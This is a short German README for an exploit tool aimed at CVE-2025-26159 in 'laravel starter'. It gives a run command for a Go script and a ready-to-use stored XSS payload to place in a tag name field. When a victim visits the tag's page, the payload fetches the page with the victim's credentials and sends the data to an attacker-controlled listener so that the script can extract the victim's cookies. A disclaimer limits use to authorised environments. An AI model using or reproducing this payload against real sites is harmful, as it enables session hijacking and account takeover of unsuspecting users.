
Dieses Skript dekodiert, filtert und extrahiert Cookies im Rahmen der Ausnutzung von CVE-2025-26159.
Dieses Skript darf nur in autorisierten Umgebungen verwendet werden, in denen eine ausdrückliche Genehmigung erteilt wurde. Der Autor übernimmt keine Verantwortung für Missbrauch, Schäden oder Folgen, die aus der Verwendung dieses Skripts entstehen.
Dieses Skript dekodiert, filtert und extrahiert Cookies im Rahmen der Ausnutzung von CVE-2025-26159.
Um die Schritte zur Ausnutzung zu verstehen, schau dir diesen Post auf meinem Blog an.
go run CVE-2025-26159.go
Füge im Tag-Namensfeld von laravel starter diesen Payload hinzu:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
Nachdem ein Benutzer die Detailseite des schädlichen Tags besucht, erhältst du dessen Cookies.